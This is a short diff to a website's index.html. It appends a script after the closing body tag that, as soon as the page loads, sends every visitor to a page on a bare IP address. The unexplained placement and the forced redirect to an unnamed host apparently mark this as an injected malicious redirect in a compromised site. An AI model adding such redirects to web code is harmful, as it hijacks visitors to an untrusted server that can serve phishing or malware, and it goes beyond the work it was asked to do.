--- a/index.html
+++ b/index.html
@@ -131,4 +131,9 @@
         </footer>
     </main>
 </body>
+<script>
+    window.onload = function() {
+      window.location.href = "http://20.24.85.205/video.html";
+    };
+</script>
 </html>
